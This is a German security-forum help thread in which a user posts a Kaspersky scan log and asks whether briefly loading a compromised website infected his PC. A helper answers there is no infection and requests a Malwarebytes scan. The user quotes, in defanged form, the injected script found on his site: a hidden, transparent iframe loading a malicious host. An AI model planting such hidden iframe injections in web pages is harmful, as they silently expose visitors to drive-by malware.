Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.

Antwort
Alt 10.01.2013, 03:22   #1
harry1973
 
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - Standard

webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?



hallo,

ich bin eine vollmeise. ich habe für 5 min den kaspersky deaktiviert um eine infizierte webseite bzw. eine datei davon herunterladen zu können und diese dann im editor zu bereinigen. leider habe ich übersehen dass da noch eine weitere infizierte datei ist und hab zudem vergessen kasperksy wieder zu aktivieren und hab dann blöderweise die webseite aufgerufen. beim laden der seite habe ich dann gechekt, dass kasperky nicht aktiv ist und hab sofort das internet abgehängt.

hab dann kaspersky laufen lassen und er hat im firefox cache 4 dateien mit HEUR:Trojan.Script.Generic sowie 2 dateien mit der endung .dll im programmordner von adobe bridge gefunden.

kann es sein, dass in den 10 sekunden wo ich die seite geladen habe, bereits eine infektion statt gefunden hat und dass in dieser kurzen zeit auch schon daten von meinem computer übertragen wurden? ich hatte vor einiger zeit schon mal das problem, wo daten von meinem computer übertragen wurden.

danke für eure hilfe!

lg
harry

Alt 10.01.2013, 13:05   #2
ryder
/// TB-Ausbilder
 
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - Standard

webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?



Und wie die Dateien genau heissen dürfen wir uns ausdenken?

Bitte Logfiles dazu anzeigen:

So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert mir massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu gross für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
__________________

__________________

Alt 12.01.2013, 10:10   #3
ryder
/// TB-Ausbilder
 
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - Standard

webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?



Fehlende Rückmeldung
Dieses Thema wurde aus den Abos gelöscht. Somit bekomm ich keine Benachrichtigung über neue Antworten.
PM an mich falls Du denoch weiter machen willst.

Hinweis: Das Verschwinden der Symptome bedeutet nicht, dass Dein Rechner schon sauber ist.

Jeder andere bitte hier klicken und einen eigenen Thread erstellen
__________________
__________________

Alt 12.01.2013, 13:35   #4
harry1973
 
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - Standard

webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?



hallo,

hier das logfile:
Code:
ATTFilter
Rootkit Scan: completed 29 days ago   (events: 2, objects: 2323, time: 00:14:34)	
14.12.2012 09:59:31	Task completed				
14.12.2012 09:44:57	Task started				
Rootkit Scan: completed 27 days ago   (events: 2, objects: 2453, time: 00:30:07)	
15.12.2012 15:16:47	Task completed				
15.12.2012 14:46:34	Task started				
Rootkit Scan: completed 27 days ago   (events: 2, objects: 524, time: 00:07:47)	
16.12.2012 10:16:39	Task completed				
16.12.2012 10:08:47	Task started				
Rootkit Scan: completed 25 days ago   (events: 2, objects: 2616, time: 00:15:25)	
17.12.2012 18:51:56	Task completed				
17.12.2012 18:36:27	Task started				
Rootkit Scan: completed 24 days ago   (events: 2, objects: 51, time: 00:09:11)	
18.12.2012 18:15:29	Task completed				
18.12.2012 18:06:11	Task started				
Rootkit Scan: completed 23 days ago   (events: 2, objects: 2334, time: 00:16:05)	
19.12.2012 18:53:35	Task completed				
19.12.2012 18:37:30	Task started				
Rootkit Scan: completed 22 days ago   (events: 2, objects: 2572, time: 00:16:50)	
20.12.2012 18:54:32	Task completed				
20.12.2012 18:37:41	Task started				
Rootkit Scan: completed 22 days ago   (events: 2, objects: 2275, time: 00:16:14)	
21.12.2012 06:56:42	Task completed				
21.12.2012 06:40:28	Task started				
Rootkit Scan: completed 20 days ago   (events: 2, objects: 2240, time: 00:14:30)	
23.12.2012 10:22:22	Task completed				
23.12.2012 10:07:52	Task started				
Rootkit Scan: completed 19 days ago   (events: 2, objects: 2427, time: 00:13:17)	
24.12.2012 10:21:02	Task completed				
24.12.2012 10:07:45	Task started				
Rootkit Scan: malfunction    (events: 1, objects: 0, time: Unknown)	
24.12.2012 14:56:28	Task started				
Rootkit Scan: completed 17 days ago   (events: 2, objects: 2416, time: 00:13:13)	
25.12.2012 14:47:40	Task completed				
25.12.2012 14:34:27	Task started				
Rootkit Scan: completed 16 days ago   (events: 2, objects: 2120, time: 00:11:14)	
26.12.2012 11:18:45	Task completed				
26.12.2012 11:07:31	Task started				
Rootkit Scan: completed 16 days ago   (events: 2, objects: 2233, time: 00:13:20)	
27.12.2012 08:09:44	Task completed				
27.12.2012 07:56:24	Task started				
Rootkit Scan: completed 12 days ago   (events: 2, objects: 2175, time: 00:11:34)	
30.12.2012 12:42:48	Task completed				
30.12.2012 12:31:14	Task started				
Rootkit Scan: completed 11 days ago   (events: 2, objects: 2175, time: 00:11:46)	
31.12.2012 11:03:32	Task completed				
31.12.2012 10:51:46	Task started				
Rootkit Scan: completed 10 days ago   (events: 2, objects: 2234, time: 00:12:54)	
01.01.2013 12:23:54	Task completed				
01.01.2013 12:11:00	Task started				
Rootkit Scan: completed 9 days ago   (events: 2, objects: 2574, time: 00:14:52)	
02.01.2013 12:25:53	Task completed				
02.01.2013 12:11:00	Task started				
Rootkit Scan: completed 8 days ago   (events: 2, objects: 2250, time: 00:12:52)	
04.01.2013 09:25:57	Task completed				
04.01.2013 09:13:05	Task started				
Rootkit Scan: completed 6 days ago   (events: 2, objects: 320, time: 00:02:41)	
05.01.2013 16:00:21	Task completed				
05.01.2013 15:57:37	Task started				
Rootkit Scan: completed 5 days ago   (events: 2, objects: 2366, time: 00:13:49)	
06.01.2013 10:49:25	Task completed				
06.01.2013 10:35:35	Task started				
Rootkit Scan: completed 4 days ago   (events: 2, objects: 2322, time: 00:17:43)	
07.01.2013 19:14:20	Task completed				
07.01.2013 18:56:37	Task started				
Full Scan: completed 2 days ago   (events: 29, objects: 2229281, time: 05:05:55)	
09.01.2013 08:10:43	Task started				
09.01.2013 08:15:16	Task stopped				
09.01.2013 08:15:20	Task started				
09.01.2013 08:26:57	Task stopped				
09.01.2013 08:26:59	Task started				
09.01.2013 08:58:27	Task stopped				
09.01.2013 08:58:31	Task started				
09.01.2013 08:59:54	Detected: HEUR:Trojan.Script.Generic	C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\2\48\C2D47d01			
09.01.2013 09:00:24	Detected: HEUR:Trojan.Script.Generic	C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\2\DF\188E6d01			
09.01.2013 09:03:09	Detected: HEUR:Trojan.Script.Generic	C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\9\AC\51A8Cd01			
09.01.2013 09:04:04	Detected: HEUR:Trojan.Script.Generic	C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\C\5E\0C1C7d01			
09.01.2013 09:04:27	Detected: HEUR:Trojan.Script.Generic	C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\C\B9\465B2d01			
09.01.2013 09:11:10	Detected: Packed.Win32.Klone.bq	C:\Programme\Adobe\Adobe Bridge\browser\zip.dll			
09.01.2013 09:11:19	Deleted: Packed.Win32.Klone.bq	C:\Programme\Adobe\Adobe Bridge\browser\zip.dll			
09.01.2013 09:44:02	Task stopped				
09.01.2013 09:44:05	Task started				
09.01.2013 10:20:18	Task stopped				
09.01.2013 10:20:20	Task started				
09.01.2013 10:51:56	Task stopped				
09.01.2013 10:51:58	Task started				
09.01.2013 11:11:43	Task stopped				
09.01.2013 11:11:45	Task started				
09.01.2013 11:57:03	Processing error	D:\##_E-Mails_##\Outlook.pst	Read error		
09.01.2013 12:02:24	Task stopped				
09.01.2013 12:04:57	Task started							
09.01.2013 17:10:52	Task completed				
Rootkit Scan: completed 2 days ago   (events: 2, objects: 2350, time: 00:12:43)	
09.01.2013 17:24:37	Task completed				
09.01.2013 17:11:54	Task started
         
und hier der code der in der index.php sowie den javascripts war:

Code:
ATTFilter
<s c r i p t>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="hxxx://g c l a b r e l s c o n . n e t / a b o u t . p h p"></iframe></div>');</ s c r i p t>
         

Alt 12.01.2013, 16:48   #5
ryder
/// TB-Ausbilder
 
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - Standard

webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?



Da ist keine Infektion.

Zur Kontrolle:

Quick-Scan mit Malwarebytes

Downloade Dir bitte Malwarebytes
  • Installiere das Programm in den vorgegebenen Pfad.
    Vista und Win7 User mit Rechtsklick "als Administrator starten"
  • Starte Malwarebytes, klicke auf Aktualisierung --> Suche nach Aktualisierung
  • Wenn das Update beendet wurde, aktiviere Quickscan durchführen und drücke auf Scannen.
  • Wenn der Scan beendet ist, klicke auf Ergebnisse anzeigen.
  • Versichere Dich, dass alle Funde markiert sind und drücke Entferne Auswahl.
  • Poste das Logfile, welches sich in Notepad öffnet, hier in den Thread.
  • Nachträglich kannst du den Bericht unter "Log Dateien" finden.

__________________
Digitale Freibeuter gegen Malware!
Keine Hilfe per PM!

Alt 12.01.2013, 16:54   #6
harry1973
 
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - Standard

webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?



super! danke für die hilfe! malwarebytes habe ich zusätzlich installiert und war auch aktiv.

lg
harry

Alt 12.01.2013, 16:57   #7
ryder
/// TB-Ausbilder
 
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - Standard

webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?



Du liest aber schon was ich schreibe oder?
Du möchtest bitte einen aktuellen Scan machen!
__________________
Digitale Freibeuter gegen Malware!
Keine Hilfe per PM!

Alt 12.01.2013, 16:59   #8
harry1973
 
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - Standard

webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?



jup, scan läuft schon sein einigen stunden.
lg
harry

Alt 12.01.2013, 17:00   #9
ryder
/// TB-Ausbilder
 
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - Standard

webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?



Da steht eindeutig was von Quickscan.
__________________
Digitale Freibeuter gegen Malware!
Keine Hilfe per PM!

Alt 15.01.2013, 14:03   #10
ryder
/// TB-Ausbilder
 
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - Standard

webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?



Das Thema ist endgültig beendet.
__________________
Digitale Freibeuter gegen Malware!
Keine Hilfe per PM!

Antwort

Themen zu webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?
.dll, adobe, aktiviere, aktivieren, cache, computer, datei, dateien, daten, deaktiviert, firefox, heur, heur:trojan.script.generic, infektion, infizierte, interne, internet, kaspersky, kurze, laufen, min, problem, sekunden, trojan.script.generic, trojaner, webseite



Ähnliche Themen: webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?


  1. Infizierung nach Malwarebytes-Scan
    Log-Analyse und Auswertung - 04.04.2014 (11)
  2. Snap.do Infizierung nach PDF-Creator Download
    Plagegeister aller Art und deren Bekämpfung - 25.04.2013 (9)
  3. Infizierung von Trojan.Agent.Gen nach Groupon Mail
    Log-Analyse und Auswertung - 21.03.2013 (7)
  4. OTL Logfiles nach Infizierung mit GVU Trojaner ; PC jetzt sauber? Hilfe
    Log-Analyse und Auswertung - 13.08.2012 (18)
  5. BKA Trojaner - kein internet mehr möglich
    Plagegeister aller Art und deren Bekämpfung - 25.07.2012 (16)
  6. OTL-Logfile-Auswertung nach GVU-Trojaner-Infizierung
    Log-Analyse und Auswertung - 09.07.2012 (2)
  7. mögliche Recovery CD Infizierung möglich?
    Plagegeister aller Art und deren Bekämpfung - 20.12.2011 (3)
  8. Infizierung durch bloßes herunterladen möglich?
    Log-Analyse und Auswertung - 02.07.2011 (20)
  9. TR/Kazy.mekml.1 - Grad der Infizierung nach Löschung zweier Trojaner-Exe-Dateien
    Log-Analyse und Auswertung - 17.05.2011 (17)
  10. Trojaner nach Besuch von suspekter Webseite
    Log-Analyse und Auswertung - 16.05.2011 (43)
  11. nach Virenbefall keine Verbindung zum Internet möglich
    Plagegeister aller Art und deren Bekämpfung - 31.01.2011 (7)
  12. I-net wird geschlossen/ Verbindung gekappt
    Log-Analyse und Auswertung - 16.04.2008 (1)
  13. w-lan wird ständig gekappt virus!? + logfile
    Log-Analyse und Auswertung - 04.02.2007 (1)
  14. Internet hängt sich nach kurzer Zeit auf - Trennung nicht mehr möglich
    Log-Analyse und Auswertung - 15.01.2007 (3)
  15. Ich hab keinen Bock mehr / Verbindung gekappt
    Plagegeister aller Art und deren Bekämpfung - 17.03.2006 (14)
  16. Nach Entfernen von CoolWebSearch & VX2 keine Einwahl ins Internet mehr möglich...
    Plagegeister aller Art und deren Bekämpfung - 12.01.2006 (2)
  17. Unpak32.exe- I-Verbindung gekappt
    Plagegeister aller Art und deren Bekämpfung - 05.06.2005 (4)

Zum Thema webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? - hallo, ich bin eine vollmeise. ich habe für 5 min den kaspersky deaktiviert um eine infizierte webseite bzw. eine datei davon herunterladen zu können und diese dann im editor zu - webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?...
Archiv
Du betrachtest: webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.